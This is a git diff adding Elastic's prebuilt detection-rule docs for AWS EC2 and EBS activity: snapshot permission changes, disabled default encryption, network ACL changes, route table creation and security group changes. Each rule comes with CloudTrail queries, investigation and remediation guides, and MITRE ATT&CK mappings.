https://docs.aws.amazon.com/ebs/latest/userguide/ebs-modifying-snapshot-permissions.html[EBS Snapshot Permissions] + - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifySnapshotAttribute.html[ModifySnapshotAttribute API Reference] + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.action == "ModifySnapshotAttribute" + and event.outcome == "success" + and stringContains (aws.cloudtrail.request_parameters, "attributeType=CREATE_VOLUME_PERMISSION") + and stringContains (aws.cloudtrail.request_parameters, "remove=") + and not source.address == "backup.amazonaws.com" + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-encryption-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-encryption-disabled.asciidoc new file mode 100644 index 0000000000..f41c786126 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-encryption-disabled.asciidoc @@ -0,0 +1,172 @@ +[[prebuilt-rule-8-19-32-aws-ec2-encryption-disabled]] +=== AWS EC2 Encryption Disabled + +Detects when Amazon Elastic Block Store (EBS) encryption by default is disabled in an AWS region. EBS encryption ensures that newly created volumes and snapshots are automatically protected with AWS Key Management Service (KMS) keys. Disabling this setting introduces significant risk as all future volumes created in that region will be unencrypted by default, potentially exposing sensitive data at rest. Adversaries may disable encryption to weaken data protection before exfiltrating or tampering with EBS volumes or snapshots. This may be a step in preparation for data theft or ransomware-style attacks that depend on unencrypted volumes. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/disable-ebs-encryption-by-default.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 Encryption Disabled* + + +Amazon Elastic Block Store (EBS) encryption ensures that all new EBS volumes and snapshots are encrypted at rest using AWS KMS keys. +When encryption by default is disabled, new EBS volumes in the region will no longer inherit automatic encryption. +This action can have serious security implications as it can weaken the organization’s data protection posture, violate compliance requirements, or enable adversaries to read or exfiltrate sensitive information without triggering encryption-based access controls. + + +*Possible investigation steps* + + +**Identify the initiator and context** +- Review the `aws.cloudtrail.user_identity` fields to determine who or what performed the `DisableEbsEncryptionByDefault` action. + - Examine the `user_identity.type` (e.g., IAMUser, AssumedRole, Root, FederatedUser). + - Validate whether the actor is authorized to modify account-level encryption defaults. +- Check `source.ip` and `user_agent.original` to identify the origin of the request and whether it came from a known administrative system, automation process, or an unfamiliar host. +- Correlate with recent IAM activity such as `AttachUserPolicy`, `UpdateAccountPasswordPolicy`, or `PutAccountSetting` to identify potential privilege escalation or account misuse. + +**Review the timing and scope** +- Compare the event `@timestamp` with other CloudTrail management events to determine if the encryption change occurred alongside other administrative modifications. +- Investigate if similar actions were executed in other AWS regions, disabling encryption regionally may be part of a broader campaign. +- Review AWS Config or Security Hub findings to determine whether compliance controls or data protection standards (e.g., CIS, PCI-DSS, ISO 27001) have been violated. + +**Assess data exposure risk** +- Identify newly created or modified EBS volumes after the timestamp of this change. + - Query CloudTrail for `CreateVolume` or `CreateSnapshot` events without `Encrypted:true`. +- Determine whether sensitive workloads, such as production databases or applications, rely on unencrypted EBS volumes. +- Check for `CopySnapshot` or `ModifySnapshotAttribute` activity that could indicate data staging or exfiltration. + +**Correlate related security events** +- Look for concurrent detections or GuardDuty findings involving IAM privilege misuse, credential exposure, or configuration tampering. +- Review CloudTrail logs for any `DisableKeyRotation` or `ScheduleKeyDeletion` events related to the KMS key used for EBS encryption. These may indicate attempts to disrupt encryption mechanisms entirely. +- Review AWS Config timeline to confirm whether encryption-by-default was re-enabled or remained off. + + +*False positive analysis* + + +- **Administrative changes**: System or cloud administrators may disable default encryption temporarily for troubleshooting or migration. Verify if the user identity, role, or automation process is part of a legitimate change. +- **Infrastructure testing**: Non-production environments may disable encryption for cost or performance benchmarking. These should be tagged and excluded. +- **Service misconfiguration**: Some provisioning frameworks or scripts may unintentionally disable encryption defaults during environment setup. Ensure automation code uses explicit encryption flags when creating resources. + +If confirmed as expected, document the change request, implementation window, and user responsible for traceability. + + +*Response and remediation* + + +**Containment and restoration** +- Re-enable EBS encryption by default in the affected region to restore protection for new volumes: + - Via AWS Console: EC2 → Account Attributes → EBS encryption → Enable by default. + - Or via CLI/API: `enable-ebs-encryption-by-default`. +- Audit recently created EBS volumes and snapshots. + - Identify any unencrypted resources and re-encrypt them using KMS keys or snapshot-copy encryption workflows. +- Verify that AWS Config rules and Security Hub controls related to EBS encryption (`ec2-ebs-encryption-by-default-enabled`) are enabled and compliant. + +**Investigate and scope** +- Review IAM policies to ensure only designated administrators have the `ec2:DisableEbsEncryptionByDefault` permission. +- Check for other regional encryption settings (e.g., S3 default encryption) that may have been modified by the same user or automation role. +- Examine whether any new IAM roles or policies were added that allow similar encryption or security modifications. + +**Long-term hardening** +- Enable organization-level service control policies (SCPs) to prevent future disabling of encryption-by-default across accounts. +- Establish AWS Config conformance packs or Security Hub standards to continuously monitor this setting. +- Integrate detection correlation (e.g., link EBS encryption disablement with subsequent unencrypted `CreateVolume` events) for improved alert fidelity. +- Educate administrators on data protection implications and require change approvals for encryption-related settings. + +**Recovery validation** +- After restoring encryption-by-default, validate the change in CloudTrail and AWS Config timelines. +- Confirm that subsequent EBS volumes are created with `Encrypted:true`. +- Conduct a short post-incident review to document root cause, impact, and lessons learned for compliance audits. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS Incident Response Playbooks]**: guidance for investigating unauthorized access to modify account settings. +- **https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]**: Example framework for customers to create, develop, and integrate security playbooks in preparation for potential attack scenarios when using AWS services +- **AWS Documentation: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html[EBS Encryption at Rest]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DisableEbsEncryptionByDefault and event.outcome:success + and not user_agent.original: (*Terraform*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-creation.asciidoc new file mode 100644 index 0000000000..d80309b90a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-creation.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-creation]] +=== AWS EC2 Network Access Control List Creation + +Identifies the creation of an AWS EC2 network access control list (ACL) or an entry in a network ACL with a specified rule number. Adversaries may exploit ACLs to establish persistence or exfiltrate data by creating permissive rules. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/create-network-acl.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateNetworkAcl.html +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/create-network-acl-entry.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateNetworkAclEntry.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 Network Access Control List Creation* + + +AWS EC2 Network ACLs are stateless firewalls for controlling inbound and outbound traffic at the subnet level. Adversaries may exploit ACLs to establish persistence or exfiltrate data by creating permissive rules. The detection rule monitors successful creation events of ACLs or entries, flagging potential unauthorized modifications that align with persistence tactics, aiding in early threat identification. + + +*Possible investigation steps* + + +- Review the CloudTrail logs for the specific event.dataset:aws.cloudtrail entries to identify the user or role (event.user) that initiated the CreateNetworkAcl or CreateNetworkAclEntry actions. +- Examine the event.provider:ec2.amazonaws.com logs to determine the IP addresses and locations associated with the request to assess if they are expected or suspicious. +- Check the event.action details to understand the specific rules created in the Network ACL, focusing on any overly permissive rules that could indicate a security risk. +- Investigate the event.outcome:success entries to confirm the successful creation of the ACL or ACL entry and correlate with any other suspicious activities in the AWS environment. +- Cross-reference the event with other security alerts or logs to identify any patterns or anomalies that could suggest malicious intent or unauthorized access. +- Assess the impact of the new ACL rules on the network security posture, ensuring they do not inadvertently allow unauthorized access or data exfiltration. + + +*False positive analysis* + + +- Routine infrastructure updates or deployments may trigger the creation of new network ACLs or entries. To manage this, establish a baseline of expected changes during scheduled maintenance windows and exclude these from alerts. +- Automated scripts or infrastructure-as-code tools like Terraform or CloudFormation can create network ACLs as part of normal operations. Identify and whitelist these automated processes to prevent unnecessary alerts. +- Changes made by trusted administrators or security teams for legitimate purposes can be mistaken for suspicious activity. Implement a process to log and review approved changes, allowing you to exclude these from detection. +- Temporary ACLs created for troubleshooting or testing purposes can generate alerts. Document and track these activities, and use tags or naming conventions to easily identify and exclude them from monitoring. +- Third-party services or integrations that require specific network configurations might create ACLs. Review and validate these services, and if deemed safe, add them to an exception list to reduce false positives. + + +*Response and remediation* + + +- Immediately review the AWS CloudTrail logs to confirm the creation of the Network ACL or entry and identify the IAM user or role responsible for the action. This helps determine if the action was authorized or potentially malicious. +- Revoke any suspicious or unauthorized IAM credentials associated with the creation of the Network ACL or entry to prevent further unauthorized access. +- Modify or delete the newly created Network ACL or entry if it is determined to be unauthorized or overly permissive, ensuring that it aligns with your organization's security policies. +- Conduct a security review of the affected AWS environment to identify any other unauthorized changes or indicators of compromise, focusing on persistence mechanisms. +- Implement additional monitoring and alerting for changes to Network ACLs and other critical AWS resources to enhance detection of similar threats in the future. +- Escalate the incident to the security operations team or incident response team for further investigation and to determine if additional containment or remediation actions are necessary. +- Review and update IAM policies and permissions to ensure the principle of least privilege is enforced, reducing the risk of unauthorized changes to network configurations. + + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(CreateNetworkAcl or CreateNetworkAclEntry) and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi* or *Ansible*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-deletion.asciidoc new file mode 100644 index 0000000000..1955f4935d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-deletion.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-deletion]] +=== AWS EC2 Network Access Control List Deletion + +Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-network-acl.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteNetworkAcl.html +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-network-acl-entry.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteNetworkAclEntry.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 Network Access Control List Deletion* + + +AWS EC2 Network ACLs are essential for controlling inbound and outbound traffic to subnets, acting as a firewall layer. Adversaries may delete these ACLs to disable security controls, facilitating unauthorized access or data exfiltration. The detection rule monitors AWS CloudTrail logs for successful deletion events of ACLs or their entries, signaling potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the AWS CloudTrail logs to identify the specific user or role associated with the deletion event by examining the user identity information in the logs. +- Check the time and date of the deletion event to determine if it coincides with any other suspicious activities or known maintenance windows. +- Investigate the source IP address and location from which the deletion request was made to assess if it aligns with expected access patterns or if it appears anomalous. +- Examine the AWS account activity around the time of the event to identify any other unusual actions or changes, such as the creation of new resources or modifications to existing ones. +- Assess the impact of the deleted Network ACL or entries by identifying the affected subnets and evaluating the potential exposure or risk to the network. +- Review any recent changes to IAM policies or roles that might have inadvertently granted excessive permissions to users or services, allowing them to delete Network ACLs. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel may trigger deletion events. Verify if the deletion aligns with scheduled maintenance activities and consider excluding these events from alerts. +- Automated scripts or infrastructure-as-code tools like Terraform or CloudFormation might delete and recreate ACLs as part of normal operations. Identify these tools and exclude their actions from triggering alerts. +- Changes in network architecture or security policy updates can lead to legitimate ACL deletions. Document these changes and adjust the detection rule to ignore such planned modifications. +- Ensure that the AWS accounts involved in the deletion events are recognized and trusted. Exclude actions from these accounts if they are part of regular administrative tasks. +- Collaborate with the security team to establish a baseline of normal ACL deletion activities and refine the detection rule to minimize false positives based on this baseline. + + +*Response and remediation* + + +- Immediately isolate the affected subnet to prevent further unauthorized access or data exfiltration. This can be done by applying a restrictive security group or temporarily removing the subnet from the VPC. +- Review AWS CloudTrail logs to identify the source of the deletion event, including the IAM user or role responsible, and assess whether the action was authorized or part of a larger compromise. +- Recreate the deleted Network ACL or its entries using the most recent backup or configuration documentation to restore intended security controls. +- Implement a temporary monitoring solution to track any further unauthorized changes to network ACLs or related security configurations. +- Escalate the incident to the security operations team for a comprehensive investigation to determine the root cause and scope of the breach, including potential lateral movement or data exfiltration. +- Revoke or rotate credentials for any compromised IAM users or roles involved in the deletion event to prevent further unauthorized actions. +- Enhance detection capabilities by configuring alerts for any future unauthorized changes to network ACLs, ensuring rapid response to similar threats. + +==== Setup + + +The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(DeleteNetworkAcl or DeleteNetworkAclEntry) and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi* or *Ansible*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-route-table-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-route-table-created.asciidoc new file mode 100644 index 0000000000..9af7d7e215 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-route-table-created.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-32-aws-ec2-route-table-created]] +=== AWS EC2 Route Table Created + +Identifies when an EC2 Route Table has been created. Route tables can be used by attackers to disrupt network traffic, reroute communications, or maintain persistence in a compromised environment. This is a New Terms rule that detects the first instance of this behavior by a user or role. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/ +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRoute.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRouteTable + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Persistence +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 Route Table Created* + + +AWS Route Tables are crucial components in managing network traffic within AWS environments, directing data between subnets and internet gateways. Adversaries may exploit route tables to reroute traffic for data exfiltration or to establish persistence by creating unauthorized routes. The detection rule monitors successful creation events of route tables, flagging potential misuse by correlating specific AWS CloudTrail logs, thus aiding in identifying unauthorized network configuration changes. + + +*Possible investigation steps* + + +- Investigate the AWS account and IAM user or role to determine if the action aligns with expected behavior and permissions. +- Examine the newly created route table's configuration to identify any unauthorized or suspicious routes that could indicate potential misuse or data exfiltration attempts. +- Correlate the event with other network security monitoring data to identify any unusual traffic patterns or anomalies that coincide with the route table creation. +- Assess the environment for any recent changes or incidents that might explain the creation of the route table, such as new deployments or infrastructure modifications. + + +*False positive analysis* + + +- Routine infrastructure updates or deployments may trigger route table creation events. To manage this, establish a baseline of expected behavior during scheduled maintenance windows and exclude these from alerts. +- Automated cloud management tools often create route tables as part of their operations. Identify these tools and create exceptions for their known activities to reduce noise. +- Development and testing environments frequently undergo changes, including the creation of route tables. Consider excluding these environments from alerts or applying a different set of monitoring rules. +- Legitimate changes by authorized personnel can be mistaken for suspicious activity. Implement a process to verify and document authorized changes, allowing for quick exclusion of these events from alerts. +- Multi-account AWS setups might have centralized networking teams that create route tables across accounts. Coordinate with these teams to understand their activities and exclude them from triggering alerts. + + +*Response and remediation* + + +- If unauthorized, remove permissions for related actions from the user or role. You can use the managed https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSDenyAll.html[AWSDenyAll] policy. +- Review the newly created route table and any associated routes to identify unauthorized entries. Remove any routes that are not part of the expected network configuration. +- Conduct a thorough audit of IAM roles and permissions to ensure that only authorized users have the ability to create or modify route tables. Revoke any excessive permissions identified. +- Implement network monitoring to detect unusual traffic patterns that may indicate data exfiltration or other malicious activities. +- Escalate the incident to the security operations team for further investigation and to determine if additional AWS resources have been compromised. +- Review AWS CloudTrail logs for any other suspicious activities around the time of the route table creation to identify potential indicators of compromise. +- Update security policies and procedures to include specific guidelines for monitoring and responding to unauthorized route table modifications, ensuring rapid detection and response in the future. + +==== Setup + + +The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "ec2.amazonaws.com" + and event.action:( + "CreateRoute" or + "CreateRouteTable" + ) + and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-security-group-configuration-change.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-security-group-configuration-change.asciidoc new file mode 100644 index 0000000000..a67fe57fba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-security-group-configuration-change.asciidoc @@ -0,0 +1,168 @@ +[[prebuilt-rule-8-19-32-aws-ec2-security-group-configuration-change]] +=== AWS EC2 Security Group Configuration Change + +Identifies a change to an AWS Security Group Configuration. A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-security-groups.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 Security Group Configuration Change* + + +This rule identifies any changes to an AWS Security Group, which functions as a virtual firewall controlling inbound and outbound traffic for resources like EC2 instances. Modifications to a security group configuration could expose critical assets to unauthorized access. Threat actors may exploit such changes to establish persistence, exfiltrate data, or pivot within an AWS environment. + + +*Possible Investigation Steps* + + +**Identify the Modified Security Group**: + - **Security Group ID**: Check the `aws.cloudtrail.request_parameters` field to identify the specific security group affected. + - **Rule Changes**: Review `aws.cloudtrail.response_elements` to determine the new rules or configurations, including any added or removed IP ranges, protocol changes, and port specifications. + +**Review User Context**: + - **User Identity**: Inspect the `aws.cloudtrail.user_identity.arn` field to determine which user or role made the modification. Verify if this is an authorized administrator or a potentially compromised account. + - **Access Patterns**: Analyze whether this user regularly interacts with security group configurations or if this event is out of the ordinary for their account. + +**Analyze the Configuration Change**: + - **Egress vs. Ingress**: Determine if the change affected inbound (ingress) or outbound (egress) traffic by reviewing fields like `isEgress` in the `securityGroupRuleSet`. Unauthorized changes to outbound traffic can indicate data exfiltration attempts. + - **IP Ranges and Ports**: Assess any added IP ranges, especially `0.0.0.0/0`, which exposes resources to the internet. Port changes should also be evaluated to ensure only necessary ports are open. + +**Check User Agent and Source IP**: + - **User Agent Analysis**: Examine the `user_agent.original` field to identify the tool or application used, such as `AWS Console` or `Terraform`, which may reveal if the action was automated or manual. + - **Source IP and Geolocation**: Use `source.address` and `source.geo` fields to verify if the IP address and geolocation match expected locations for your organization. Unexpected IPs or regions may indicate unauthorized access. + +**Evaluate for Persistence Indicators**: + - **Repeated Changes**: Investigate if similar changes were recently made across multiple security groups, which may suggest an attempt to maintain or expand access. + - **Permissions Review**: Confirm that the user’s IAM policies are configured to limit changes to security groups only as necessary. + +**Correlate with Other CloudTrail Events**: + - **Cross-Reference Other Security Events**: Look for related actions like `AuthorizeSecurityGroupIngress`, `CreateSecurityGroup`, or `RevokeSecurityGroupIngress` that may indicate additional or preparatory steps for unauthorized access. + - **Monitor for IAM or Network Changes**: Check for IAM modifications, network interface changes, or other configuration updates in the same timeframe to detect broader malicious activities. + + +*False Positive Analysis* + + +- **Routine Security Changes**: Security group modifications may be part of regular infrastructure maintenance. Verify if this action aligns with known, scheduled administrative activities. +- **Automated Configuration Management**: If you are using automated tools like `Terraform` or `CloudFormation`, confirm if the change matches expected configuration drift corrections or deployments. + + +*Response and Remediation* + + +- **Revert Unauthorized Changes**: If unauthorized, revert the security group configuration to its previous state to secure the environment. +- **Restrict Security Group Permissions**: Remove permissions to modify security groups from any compromised or unnecessary accounts to limit future access. +- **Quarantine Affected Resources**: If necessary, isolate any affected instances or resources to prevent further unauthorized activity. +- **Audit IAM and Security Group Policies**: Regularly review permissions related to security groups to ensure least privilege access and prevent excessive access. + + +*Additional Information* + + +For more details on managing AWS Security Groups and best practices, refer to the https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-security-groups.html[AWS EC2 Security Groups Documentation] and AWS security best practices. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "ec2.amazonaws.com" and event.outcome: "success" + and (event.action:( + "AuthorizeSecurityGroupIngress" or + "AuthorizeSecurityGroupEgress" or + "CreateSecurityGroup" or + "ModifySecurityGroupRules" or + "RevokeSecurityGroupEgress" or + "RevokeSecurityGroupIngress") or + (event.action: "ModifyInstanceAttribute" and aws.cloudtrail.flattened.request_parameters.groupSet.items.groupId:*)) + and not user_agent.original: (*Terraform* or *Pulumi* or *Ansible*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc 